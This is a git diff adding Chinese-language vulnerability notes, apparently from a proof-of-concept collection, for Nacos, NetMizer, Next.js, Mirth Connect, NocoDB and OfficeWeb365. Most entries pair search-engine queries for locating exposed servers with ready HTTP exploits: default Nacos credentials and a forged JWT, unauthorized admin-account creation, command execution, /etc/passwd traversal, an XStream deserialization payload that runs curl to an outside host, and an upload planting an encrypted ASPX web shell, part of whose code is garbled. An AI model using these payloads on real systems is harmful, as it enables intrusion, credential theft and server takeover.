+![1728962718996-fc330c21-16a7-4e90-9a36-48fe7096d9cb.png](./img/6t6u-HEvLLK-dJHp/1728962718996-fc330c21-16a7-4e90-9a36-48fe7096d9cb-916941.png)
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uvzl7c4yx4hiuq9k>
\ No newline at end of file
diff --git a/Nacos存在默认口令漏洞.md b/Nacos存在默认口令漏洞.md
new file mode 100644
index 0000000..0b3b7dc
--- /dev/null
+++ b/Nacos存在默认口令漏洞.md
@@ -0,0 +1,25 @@
+# Nacos存在默认口令漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos存在默认口令漏洞。</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">Nacos </font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/-rSL8iMmnJh02-2S/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-132632.png)
+
+# 四、漏洞复现
+```plain
+nacos/nacos
+```
+
+![1706100637966-94b887f6-0514-4248-ae6a-37c5dae60015.png](./img/-rSL8iMmnJh02-2S/1706100637966-94b887f6-0514-4248-ae6a-37c5dae60015-323211.png)
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sfeezle5mv21kuf2>
\ No newline at end of file
diff --git a/Nacos未授权下载配置信息.md b/Nacos未授权下载配置信息.md
new file mode 100644
index 0000000..a796309
--- /dev/null
+++ b/Nacos未授权下载配置信息.md
@@ -0,0 +1,18 @@
+# Nacos未授权下载配置信息
+
+Nacos未授权下载配置信息
+
+## fofa
+
+```javascript
+icon_hash="13942501"
+```
+
+## poc
+
+```java
+GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
+Host: 
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191401675.png)
\ No newline at end of file
diff --git a/Nacos未授权访问漏洞(CVE-2021-29441).md b/Nacos未授权访问漏洞(CVE-2021-29441).md
new file mode 100644
index 0000000..5f84da1
--- /dev/null
+++ b/Nacos未授权访问漏洞(CVE-2021-29441).md
@@ -0,0 +1,77 @@
+# Nacos未授权访问漏洞(CVE-2021-29441)
+
+# 一、漏洞简介
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。并且利用这个未授权漏洞，攻击者可以获取到用户名密码等敏感信息。</font>
+
+# <font style="color:rgb(63, 63, 63);">二、影响版本</font>
++ <font style="color:rgb(63, 63, 63);">Nacos <= 2.0.0-ALPHA.1</font>
+
+# <font style="color:rgb(63, 63, 63);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/MraeKPVNc9lFkzMT/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-600623.png)
+
+# 四、漏洞复现
+poc
+
+```plain
+GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
+User-Agent: Nacos-Server
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 
+```
+
+![1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48.png](./img/MraeKPVNc9lFkzMT/1706098516239-77b300ef-9d99-4851-8c5b-09f14ff38e48-585785.png)
+
+通过未授权访问漏洞添加账号
+
+```plain
+POST /nacos/v1/auth/users HTTP/1.1
+Host: 
+User-Agent: Nacos-Server
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 27
+
+username=test&password=test
+```
+
+![1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6.png](./img/MraeKPVNc9lFkzMT/1706098649845-0dc1d324-3bf1-438a-a267-27f93e2863c6-376550.png)
+
+查看是否添加成功
+
+```plain
+GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
+User-Agent: Nacos-Server
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 
+```
+
+![1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839.png](./img/MraeKPVNc9lFkzMT/1706098709452-b9fed77f-cff0-4dbc-aa72-01a0ec7b9839-049495.png)
+
+使用添加的账号登录
+
+![1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d.png](./img/MraeKPVNc9lFkzMT/1706098751137-9bec97ee-2d67-45bd-9b76-a9d42245928d-182574.png)
+
+
+
+> 更新: 2024-10-28 15:59:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gygvcmtv1bh6n6za>
\ No newline at end of file
diff --git a/Nacos默认key导致权限绕过登陆漏洞.md b/Nacos默认key导致权限绕过登陆漏洞.md
new file mode 100644
index 0000000..bbe9e26
--- /dev/null
+++ b/Nacos默认key导致权限绕过登陆漏洞.md
@@ -0,0 +1,66 @@
+# Nacos默认key导致权限绕过登陆漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(63, 63, 63);">Nacos 是阿里巴巴推出来的一个新开源项目，是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。</font><font style="color:rgba(0, 0, 0, 0.9);">Nacos中发现影响Nacos <= 2.1.0的问题，</font><font style="color:rgb(51, 51, 51);">nacos在默认情况下未对token.secret.key进行修改，导致攻击者可以绕过密钥认证进入后台。</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ <font style="color:rgba(0, 0, 0, 0.9);">0.1.0 <= Nacos <= 2.2.0</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">三、资产测绘</font>
++ hunter`app.name="Nacos"`
++ 特征
+
+![1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937.png](./img/LOnCocDcUxyM3hX0/1706098466504-aee1dd64-8194-4680-a095-f9ac7f516937-478295.png)
+
+# 四、漏洞复现
+1. <font style="color:rgb(51, 51, 51);">Nacos的token.secret.key值是固定死的</font>
+
+```plain
+nacos/conf/application.properties   //位于该文件中
+
+SecretKey012345678901234567890123456789012345678901234567890123456789
+```
+
+2. 构造JWT
+
+![1706099878073-f9c28eee-f92e-45b8-a9b6-91a32ac4d665.png](./img/LOnCocDcUxyM3hX0/1706099878073-f9c28eee-f92e-45b8-a9b6-91a32ac4d665-712417.png)
+
+3. <font style="color:rgb(51, 51, 51);">构造数据包获取accesstoken</font>
+
+```plain
+POST /nacos/v1/auth/users/login HTTP/1.1
+Host: 
+Content-Length: 28
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6NDA3MDk1MzY0M30.XPfd1WnNHqQdu5-D734ishsizYCEbsQG7mVwdm4MyWg
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+username=nacos&password=1111
+```
+
+![1706099933954-9f0cd917-8496-4902-85be-b27384144f06.png](./img/LOnCocDcUxyM3hX0/1706099933954-9f0cd917-8496-4902-85be-b27384144f06-367564.png)
+
+4. 登录系统
+
+<font style="color:rgb(51, 51, 51);">将返回包内容全部复制，然后在登陆时抓包，拦截返回包替换，然后发包即可登录后台</font>
+
+<font style="color:rgb(51, 51, 51);">在账号密码错误的情况下返回包为403</font>
+
+![1706100054649-9f5b4daa-8e47-417b-9bc2-066fa69a952c.png](./img/LOnCocDcUxyM3hX0/1706100054649-9f5b4daa-8e47-417b-9bc2-066fa69a952c-448988.png)
+
+<font style="color:rgb(51, 51, 51);">将拦截的返回包替换为之前的返回包内容</font>
+
+![1706100091608-5358f465-fbf8-4d00-a8c0-495b4b9da471.png](./img/LOnCocDcUxyM3hX0/1706100091608-5358f465-fbf8-4d00-a8c0-495b4b9da471-231976.png)
+
+<font style="color:rgb(51, 51, 51);">发包之后成功登录后台</font>
+
+![1706100115758-2cc1be63-70c6-4198-8c44-bf6fc2e8d617.png](./img/LOnCocDcUxyM3hX0/1706100115758-2cc1be63-70c6-4198-8c44-bf6fc2e8d617-715031.png)
+
+
+
+> 更新: 2024-10-28 15:59:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pg7g9r320fwlmxap>
\ No newline at end of file
diff --git a/NetMizer日志管理系统cmd存在命令执漏洞.md b/NetMizer日志管理系统cmd存在命令执漏洞.md
new file mode 100644
index 0000000..8e71c58
--- /dev/null
+++ b/NetMizer日志管理系统cmd存在命令执漏洞.md
@@ -0,0 +1,33 @@
+# NetMizer 日志管理系统cmd存在命令执漏洞
+
+### 一、漏洞描述
+NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞，攻击者通过传入 cmd参数即可命令执行
+
+### 二、影响版本
+<font style="color:#000000;">NetMizer</font>
+
+### 三、资产测绘
+```plain
+title="NetMizer 日志管理系统"
+```
+
+![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/2_8as_pka3_kmJuE/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-579033.png)
+
+### 四、漏洞复现
+```plain
+GET /data/manage/cmd.php?cmd=id HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1720677875524-4205a312-6ae1-42a1-b263-bfa5aedcc9f1.png](./img/2_8as_pka3_kmJuE/1720677875524-4205a312-6ae1-42a1-b263-bfa5aedcc9f1-955410.png)
+
+
+
+> 更新: 2024-08-12 17:48:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hi1upuiio8gsogz8>
\ No newline at end of file
diff --git a/NetMizer日志管理系统存在前台RCE漏洞.md b/NetMizer日志管理系统存在前台RCE漏洞.md
new file mode 100644
index 0000000..df8a0ea
--- /dev/null
+++ b/NetMizer日志管理系统存在前台RCE漏洞.md
@@ -0,0 +1,39 @@
+# NetMizer 日志管理系统存在前台RCE漏洞
+
+### 一、漏洞描述
+NetMizer 日志管理系统position.php、接口处存在命令执行漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行命令，写入后门，获取服务器权限，进而控制整个web服务器。
+
+### 二、影响版本
+<font style="color:#000000;">NetMizer</font>
+
+### 三、资产测绘
+```plain
+title="NetMizer 日志管理系统"
+```
+
+![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/pcBac11H3i8YpRlr/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-738320.png)
+
+### 四、漏洞复现
+```plain
+GET /data/search/position.php?action=file&nodeid=|id%3E1.txt HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1720677595198-3656affb-0930-41f2-8854-b61e681505a3.png](./img/pcBac11H3i8YpRlr/1720677595198-3656affb-0930-41f2-8854-b61e681505a3-704021.png)
+
+```plain
+/data/search/1.txt
+```
+
+![1720677700435-c746a0b6-51d4-47fc-921f-3cd022ba8826.png](./img/pcBac11H3i8YpRlr/1720677700435-c746a0b6-51d4-47fc-921f-3cd022ba8826-191347.png)
+
+
+
+> 更新: 2024-08-12 17:48:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uwvvawaszmhd1b0w>
\ No newline at end of file
diff --git a/NetMizer日志管理系统存在目录遍历漏洞.md b/NetMizer日志管理系统存在目录遍历漏洞.md
new file mode 100644
index 0000000..1eb0c22
--- /dev/null
+++ b/NetMizer日志管理系统存在目录遍历漏洞.md
@@ -0,0 +1,26 @@
+# NetMizer 日志管理系统存在目录遍历漏洞
+
+### 一、漏洞描述
+北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞，由于 /data 控制不严格，攻击者可利用该漏洞获取敏感信息。
+
+### 二、影响版本
+<font style="color:#000000;">NetMizer</font>
+
+### 三、资产测绘
+```plain
+title="NetMizer 日志管理系统"
+```
+
+![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/zxlV67svFt2h_jMb/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-684031.png)
+
+### 四、漏洞复现
+```plain
+/data/
+```
+
+![1720677771307-280e5029-0775-4c52-8e1a-8693bac733c3.png](./img/zxlV67svFt2h_jMb/1720677771307-280e5029-0775-4c52-8e1a-8693bac733c3-722431.png)
+
+
+
+> 更新: 2024-08-12 17:48:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hqxda6dxd5064rpt>
\ No newline at end of file
diff --git a/NetMizer日志管理系统登录绕过漏洞.md b/NetMizer日志管理系统登录绕过漏洞.md
new file mode 100644
index 0000000..6884942
--- /dev/null
+++ b/NetMizer日志管理系统登录绕过漏洞.md
@@ -0,0 +1,34 @@
+# NetMizer 日志管理系统登录绕过漏洞
+
+### 一、漏洞描述
+NetMizer 日志管理系统存在登录绕过漏洞，通过限制某个请求包的发送获取后台权限
+
+### 二、影响版本
+<font style="color:#000000;">NetMizer</font>
+
+### 三、资产测绘
+```plain
+title="NetMizer 日志管理系统"
+```
+
+![1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b.png](./img/PwoyZhBf6v8Nrgv0/1720677624454-6b76b40a-5923-426e-9d81-63dd9d76617b-032975.png)
+
+### 四、漏洞复现
+访问页面 main.html 并抓取请求包
+
+```plain
+/main.html
+```
+
+, Drop掉下面对请求包
+
+![1720678035409-58d4a71b-02b3-455b-a0f1-df42bac53387.png](./img/PwoyZhBf6v8Nrgv0/1720678035409-58d4a71b-02b3-455b-a0f1-df42bac53387-098409.png)
+
+直接进入后台
+
+![1720678013546-1e4e9e3c-d746-4cba-b47f-757b6426e65a.png](./img/PwoyZhBf6v8Nrgv0/1720678013546-1e4e9e3c-d746-4cba-b47f-757b6426e65a-723156.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hgzz1oo7add2wvv4>
\ No newline at end of file
diff --git a/Next.js权限绕过(CVE-2024-51479).md b/Next.js权限绕过(CVE-2024-51479).md
new file mode 100644
index 0000000..a16e670
--- /dev/null
+++ b/Next.js权限绕过(CVE-2024-51479).md
@@ -0,0 +1,20 @@
+# Next.js权限绕过(CVE-2024-51479)
+
+Next.js 是一个用于构建全栈 Web 应用程序的 React 框架。在受影响的版本中，如果 Next.js 应用程序正在基于路径名的中间件中执行授权，则可能会绕过应用程序根目录下的页面的此授权，允许未经授权访问Next.js应用程序中的根级页面，这些页面本应受到授权检查的保护
+
+## fofa
+```javascript
+app="NEXT.JS"
+```
+
+## poc
+```javascript
+/admin?__nextLocale=111
+/admin/users?__nextLocale=anything
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501041404258.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/rPBKzvNI9wc79tDr2KC5sA
\ No newline at end of file
diff --git a/NextGenMirthConnectXStream存在反序列化远程代码执行漏洞.md b/NextGenMirthConnectXStream存在反序列化远程代码执行漏洞.md
new file mode 100644
index 0000000..214eeff
--- /dev/null
+++ b/NextGenMirthConnectXStream存在反序列化远程代码执行漏洞.md
@@ -0,0 +1,78 @@
+# NextGen Mirth Connect XStream存在反序列化远程代码执行漏洞
+
+# 一、漏洞简介
+NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)，未经身份验证的远程攻击者可利用此漏洞写入后门文件，执行任意命令，导致服务器被控。
+
+# 二、影响版本
++ `title="Mirth Connect Administrator"`
++ 特征
+
+![1729961516962-8e84d6cc-c576-4699-a794-37e8bd889d3f.png](./img/Ahlw4YbNSt6U5uWR/1729961516962-8e84d6cc-c576-4699-a794-37e8bd889d3f-547025.png)
+
+# 三、漏洞复现
+```plain
+POST /api/users HTTP/1.1
+Host: 
+X-Requested-With: OpenAPI
+Content-Type: application/xml
+
+<sorted-set>
+	<string>abcd</string>
+		<dynamic-proxy>
+			<interface>java.lang.Comparable</interface>
+			<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
+			  <target class="org.apache.commons.collections4.functors.ChainedTransformer">
+				<iTransformers>
+				  <org.apache.commons.collections4.functors.ConstantTransformer>
+					<iConstant class="java-class">java.lang.Runtime</iConstant>
+				  </org.apache.commons.collections4.functors.ConstantTransformer>
+				  <org.apache.commons.collections4.functors.InvokerTransformer>
+					<iMethodName>getMethod</iMethodName>
+					<iParamTypes>
+					  <java-class>java.lang.String</java-class>
+					  <java-class>[Ljava.lang.Class;</java-class>
+					</iParamTypes>
+					<iArgs>
+					  <string>getRuntime</string>
+					  <java-class-array/>
+					</iArgs>
+				  </org.apache.commons.collections4.functors.InvokerTransformer>
+				  <org.apache.commons.collections4.functors.InvokerTransformer>
+					<iMethodName>invoke</iMethodName>
+					<iParamTypes>
+					  <java-class>java.lang.Object</java-class>
+					  <java-class>[Ljava.lang.Object;</java-class>
+					</iParamTypes>
+					<iArgs>
+					  <null/>
+					  <object-array/>
+					</iArgs>
+				  </org.apache.commons.collections4.functors.InvokerTransformer>
+				  <org.apache.commons.collections4.functors.InvokerTransformer>
+					<iMethodName>exec</iMethodName>
+					<iParamTypes>
+					  <java-class>java.lang.String</java-class>
+					</iParamTypes>
+					<iArgs>
+					  <string>curl http://jveuewgzdi.iyhc.eu.org</string>
+					</iArgs>
+				  </org.apache.commons.collections4.functors.InvokerTransformer>
+				</iTransformers>
+			  </target>
+			  <methodName>transform</methodName>
+			  <eventTypes>
+				<string>compareTo</string>
+			  </eventTypes>
+		</handler>
+	</dynamic-proxy>
+</sorted-set>
+```
+
+
+
+![1729961537056-5c897bff-09cb-489d-bb3e-72cb9f1812f0.png](./img/Ahlw4YbNSt6U5uWR/1729961537056-5c897bff-09cb-489d-bb3e-72cb9f1812f0-384661.png)
+
+
+
+> 更新: 2024-11-27 10:01:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgpb79rrbo0w37b0>
\ No newline at end of file
diff --git a/NocoDB任意文件读取漏洞（CVE-2023-35843）.md b/NocoDB任意文件读取漏洞（CVE-2023-35843）.md
new file mode 100644
index 0000000..c86a995
--- /dev/null
+++ b/NocoDB任意文件读取漏洞（CVE-2023-35843）.md
@@ -0,0 +1,32 @@
+# NocoDB任意文件读取漏洞（CVE-2023-35843）
+
+# 一、漏洞简介
+NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB存在任意文件读取漏洞。
+
+# 二、影响版本
++ NocoDB
+
+# 三、资产测绘
++ hunter`web.icon=="5d7c3d89c1d24cb4f15a508f7f0b6daf"&&web.title="NocoDB"`
++ 登录页面
+
+![1693921077108-552cf2d5-970a-4f6e-bbcd-bf48e2538189.png](./img/9vDPKBC4oRNWg3jb/1693921077108-552cf2d5-970a-4f6e-bbcd-bf48e2538189-144298.png)
+
+# 四、漏洞复现
+```plain
+GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1693921148029-64aff3bb-16ff-4f8d-a963-b219bd5f9790.png](./img/9vDPKBC4oRNWg3jb/1693921148029-64aff3bb-16ff-4f8d-a963-b219bd5f9790-721038.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fvdfqew9f4ggosya>
\ No newline at end of file
diff --git a/OfficeWeb365-文件上传漏洞.md b/OfficeWeb365-文件上传漏洞.md
new file mode 100644
index 0000000..5c290c8
--- /dev/null
+++ b/OfficeWeb365-文件上传漏洞.md
@@ -0,0 +1,80 @@
+## OfficeWeb365 文件上传漏洞
+【消息详情】：360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息，经漏洞云复核，确认为【真实】漏洞，漏洞影响【未知】版本，该漏洞标准化POC已经上传漏洞云情报平台，平台编号：360LDYLD-2023-00002453，情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。
+360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息，经漏洞云复核，确认为【真实】漏洞，漏洞影响【未知】版本，该漏洞标准化POC已经升级漏洞云情报平台，平台编号： 360LDYLD-2023-0000245
+```
+POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1
+Host: 
+Content-Length: 500817
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
+Accept-Encoding: gzip, deflate
+
+data:image/png;base64,01s34567890123456789y12345678901234567m91<% @ Page Language="C #"%>
+
+<% @ Import namespace="System. Reflection"%>
+
+<Script Run="Server">
+
+Private byte decryption (byte data)
+
+{
+
+String key="e45e329feb5d925b";
+
+Data=Convert. FromBase64String (System. Text. Encoding. UTF8. GetString (data));
+
+System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged();
+
+Aes. Mode=System. Security. Cryptography. CipherMode. ECB;
+
+Aes. Key=Encoding. UTF8. GetBytes (key);
+
+Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7;
+
+Return aes. CreateDecryptor(). TransformFinalBlock (data, 0, data. Length);
+
+}
+
+Private Byte Encryption (Byte Data)
+
+{
+
+String key="e45e329feb5d925b";
+
+System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged();
+
+Aes. Mode=System. Security. Cryptography. CipherMode. ECB;
+
+Aes. Key=Encoding. UTF8. GetBytes (key);
+
+Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7;
+
+Return System. Text. Encoding. UTF8. GetBytes (Convert. ToBase64String (aes. CreateEncryptor(). TransformFinalBlock (data, 0, data. Length)));
+
+}
+
+</Script>
+
+<%
+
+//Byte [] c=Request. BinaryRead (Request. ContentLength); Assembly. Load (Decrypt (c)). CreateInstance ("U"). Equals (this);
+
+Byte [] c=Request. BinaryRead (Request. ContentLength);
+
+String asname=System. Text. Encoding. ASCII. GetString (new byte [] {0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x52, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79});
+
+Type Assembly=Type. GetType (asname);
+
+MethodInfo load=assembly. GetMethod ("Load", new Type [] {new byte [0]. GetType()});
+
+Object obj=load. Invoke (null, new object [] {Decrypt (c)});
+
+MethodInfo create=assembly. GetMethod ("CreateInstance", new Type [] {"". GetType()});
+
+String name=System. Text. Encoding. ASCII. GetString (new byte [] {0x55});
+
+Object pay=create. Invoke (obj, new object [] {name});
+
+Pay. Equals (this);%>>---
+
+```
diff --git a/OfficeWeb365Pic存在任意读取漏洞.md b/OfficeWeb365Pic存在任意读取漏洞.md
new file mode 100644
index 0000000..b029343
--- /dev/null
+++ b/OfficeWeb365Pic存在任意读取漏洞.md
@@ -0,0 +1,39 @@
+# OfficeWeb365 Pic存在任意读取漏洞
+
+# 一、漏洞简介
+OfficeWeb365是西安大西信息科技有限公司开发的，专注于Office文档在线预览及PDF文档在线预览云服务，包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览，WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站，提高客户体验、增加产品竞争力。OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，获取服务器敏感信息，使系统处于极不安全的状态。
+
+# 二、影响版本
++ OfficeWeb365
+
+# 三、资产测绘
++ hunter：`app.name="OfficeWeb365"`
+
+![1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94.png](./img/Lvi5zs9BqmYWw8we/1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94-620163.png)
+
++ 登录页面
+
+![1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636.png](./img/Lvi5zs9BqmYWw8we/1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636-180691.png)
+
+# 四、漏洞复现
+```http
+GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1705158317873-5dd3158a-9b82-425f-a3a3-6d588f57aff0.png](./img/Lvi5zs9BqmYWw8we/1705158317873-5dd3158a-9b82-425f-a3a3-6d588f57aff0-908828.png)
+
+[Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222151369-ef2358bd-08df-4e87-92ee-c1b130128665.jar)
+
+![1705158348583-85083a94-d61a-47a6-9280-2453025e7da7.png](./img/Lvi5zs9BqmYWw8we/1705158348583-85083a94-d61a-47a6-9280-2453025e7da7-397744.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ot9mxhmqtud1katb>
\ No newline at end of file
diff --git a/OfficeWeb365SaveDraw存在任意文件上传漏洞.md b/OfficeWeb365SaveDraw存在任意文件上传漏洞.md
new file mode 100644
index 0000000..89ea554
--- /dev/null
+++ b/OfficeWeb365SaveDraw存在任意文件上传漏洞.md
@@ -0,0 +1,58 @@
+# OfficeWeb365 SaveDraw存在任意文件上传漏洞
+
+# 一、漏洞简介
+OfficeWeb365是西安大西信息科技有限公司开发的，专注于Office文档在线预览及PDF文档在线预览云服务，包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览，WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站，提高客户体验、增加产品竞争力。OfficeWeb365 /PW/SaveDraw存在任意文件上传漏洞。
+
+# 二、影响版本
++ OfficeWeb365
+
+# 三、资产测绘
++ hunter：`app.name="OfficeWeb365"`
+
+![1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94.png](./img/SE9ISR0qOEH1QGWX/1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94-882686.png)
+
++ 登录页面
+
